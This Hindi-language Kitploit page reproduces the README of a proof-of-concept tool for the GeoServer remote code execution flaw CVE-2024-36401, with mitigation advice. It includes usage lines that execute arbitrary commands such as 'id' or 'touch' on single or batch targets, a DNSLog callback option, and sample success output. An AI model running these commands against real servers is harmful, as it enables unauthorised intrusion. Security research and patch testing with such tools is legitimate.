Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-36401_Geoserver_RCE_POC — यह स्क्रिप्ट GeoServer में रिमोट कोड एक्जीक्यूशन भेद्यता (CVE-2024-36401) के लिए विकसित एक PoC (Proof of Concept) डिटेक्शन टूल है। यह भेद्यता हमलावर को विशिष्ट अनुरोध बनाकर लक्ष्य सर्वर पर मनमानी कमांड निष्पादित करने की अनुमति देती है। | Kitploit
उपकरण/GitHubGitHub/amoy6228/cve-2024-36401_geoserver_rce_poc
टोहीभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोल
GitHubamoy6228/cve-2024-36401_geoserver_rce_poc

CVE-2024-36401_Geoserver_RCE_POC

यह स्क्रिप्ट GeoServer में रिमोट कोड एक्जीक्यूशन भेद्यता (CVE-2024-36401) के लिए विकसित एक PoC (Proof of Concept) डिटेक्शन टूल है। यह भेद्यता हमलावर को विशिष्ट अनुरोध बनाकर लक्ष्य सर्वर पर मनमानी कमांड निष्पादित करने की अनुमति देती है।

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
211 साल पहलेअभी तक समीक्षित नहीं

⚠️ अस्वीकरण: यह उपकरण केवल सुरक्षा अनुसंधान और कानूनी रूप से अधिकृत परीक्षण के लिए है, कृपया अवैध उद्देश्यों के लिए उपयोग न करें। उपयोगकर्ता स्वयं कानूनी जिम्मेदारी वहन करेगा।

README संस्करण: [अंग्रेज़ी | चीनी]

भेद्यता विवरण

यह स्क्रिप्ट GeoServer के लिए रिमोट कोड एक्सीक्यूशन भेद्यता (CVE-2024-36401) के लिए विकसित एक PoC (Proof of Concept) डिटेक्शन टूल है। यह भेद्यता हमलावर को विशेष अनुरोध बनाकर लक्ष्य सर्वर पर मनमानी कमांड निष्पादित करने की अनुमति देती है।


पर्यावरण निर्भरताएँ

कृपया सुनिश्चित करें कि आपके रनटाइम वातावरण में निम्नलिखित निर्भरताएँ स्थापित हैं:

  • Python 3.x
  • तृतीय-पक्ष लाइब्रेरीज़:
    • requests
    • lxml

निम्नलिखित कमांड का उपयोग करके आवश्यक निर्भरताएँ स्थापित की जा सकती हैं:

root@kitploit:~
pip install requests lxml

उपयोग निर्देश

एकल लक्ष्य का पता लगाना

root@kitploit:~
python poc.py -u http://target.com -d dnslog.example.com

या निष्पादित करने के लिए कमांड निर्दिष्ट करें:

root@kitploit:~
python poc.py -u http://target.com -c "touch /tmp/vulntest"

एकाधिक लक्ष्यों का बैच पता लगाना

एकाधिक लक्ष्य URL वाली एक टेक्स्ट फ़ाइल तैयार करें (प्रति पंक्ति एक):

root@kitploit:~
python poc.py -uf targets.txt -d dnslog.example.com

या कमांड निर्दिष्ट करें:

root@kitploit:~
python poc.py -uf targets.txt -c "id"

विस्तृत उपयोग निर्देश: विस्तृत उपयोग निर्देश दस्तावेज़


पैरामीटर विवरण

⚠️ ध्यान दें: -d और -c पैरामीटर एक साथ उपयोग नहीं किए जा सकते।


आउटपुट उदाहरण

root@kitploit:~
[INFO] 爬取到3个有效的 Typenames,开始漏洞探测
[INFO] 目标: http://example.com
[INFO] 执行命令: whoami
[INFO] DNSLOG地址:

[INFO] 正在尝试 typeName: topp:states -> whoami
[+] 命令疑似成功执行!目标: http://example.com 命令: whoami

स्क्रिप्ट विशेषताएँ

  • Nuclei POC में Typenames को हार्डकोड करने के कारण भेद्यता सत्यापन विफलता की समस्या को ठीक किया गया।
  • सभी Typenames जानकारी को स्वचालित रूप से क्रॉल करता है और उपयोग योग्य Typenames का चक्रीय परीक्षण करता है।
  • -c पैरामीटर का उपयोग करके कमांड निष्पादित करने का समर्थन करता है।
  • URL फ़ाइल इनपुट का समर्थन करता है, बैच में भेद्यता की जाँच करता है।

सुरक्षा सुझाव

  • GeoServer को आधिकारिक नवीनतम संस्करण में अपग्रेड करें।
  • सार्वजनिक नेटवर्क पर उजागर GeoServer इंस्टेंस के लिए एक्सेस नियंत्रण लागू करें।
  • /geoserver/wfs इंटरफ़ेस के एक्सेस स्रोतों को सीमित करने के लिए फ़ायरवॉल कॉन्फ़िगर करें।

योगदान

इस परियोजना को बेहतर बनाने में मदद करने के लिए Issue या Pull Request सबमिट करने का स्वागत है।


लाइसेंस

यह परियोजना MIT लाइसेंस के तहत है, आप स्वतंत्र रूप से संशोधित, वितरित और व्यावसायिक उपयोग कर सकते हैं, लेकिन कॉपीराइट नोटिस बनाए रखना होगा।

टूल डाउनलोड करें
पैरामीटरविवरण
-u, --urlएकल लक्ष्य पता निर्दिष्ट करें
-uf, --url-fileएकाधिक लक्ष्य URL वाली फ़ाइल पथ निर्दिष्ट करें
-d, --dnslogDNSLog पता निर्दिष्ट करें
-c, --commandलक्ष्य प्रणाली पर निष्पादित करने के लिए कमांड निर्दिष्ट करें (जैसे: whoami, id, curl आदि)